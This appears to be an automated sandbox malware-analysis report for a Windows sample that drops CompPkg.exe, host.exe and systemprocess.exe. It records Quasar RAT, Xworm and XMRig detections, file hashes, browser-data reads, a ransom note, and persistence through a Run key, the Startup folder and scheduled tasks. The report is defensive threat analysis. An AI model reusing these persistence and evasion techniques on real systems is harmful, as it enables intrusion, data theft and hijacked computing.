"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4392,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4684,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4680,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4708,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:8

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /delete /f /tn "CompPkg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBBD4.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /delete /tn "HOST" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KrCtYfhVKMt4.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\timeout.exe

timeout /T 5 /NOBREAK

Network

Files

C:\Windows\systemprocess.exe

MD5 b5e966fbfca567c51d5da8b2106a48e5
SHA1 164ace9df43f1a760c1205f82c9cc4eb1dfee991
SHA256 30e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8
SHA512 9169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534

C:\Windows\host.exe

MD5 1cf0ec247776f6817231070a2f75994c
SHA1 3253eccccece8243d11975e7021569251def8f2f
SHA256 e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051
SHA512 f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90

C:\Windows\CompPkg.exe

MD5 39ba631f3e54a2c480e7c83e5e6d14ff
SHA1 82f3e3f1faf9d879a37e473a81cb5d32672af099
SHA256 3dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64
SHA512 0c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yobw5zrl.eix.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkg.exe.log

C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

\??\pipe\crashpad_2016_GQJOXRGPYWMTSJZA

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

C:\Users\Admin\AppData\Local\Temp\ENC.img

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnGraphiteCache\data_1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0c0a3ea6-a3b9-4976-9d7c-f7c8974e1d2c.tmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe594472.TMP

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

Analysis: behavioral2

Detonation Overview

Submitted

2025-05-03 16:15

Reported

2025-05-03 16:18

Platform

win11-20250502-en

Max time kernel

150s

Max time network

151s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5316 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 908 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Stops running service(s)

defense_evasion execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe C:\Windows\CompPkg.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe C:\Windows\CompPkg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" C:\Windows\CompPkg.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

UPX packed file

upx

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\CompPkg.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
File created C:\Windows\systemprocess.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
File created C:\Windows\host.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\systemprocess.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
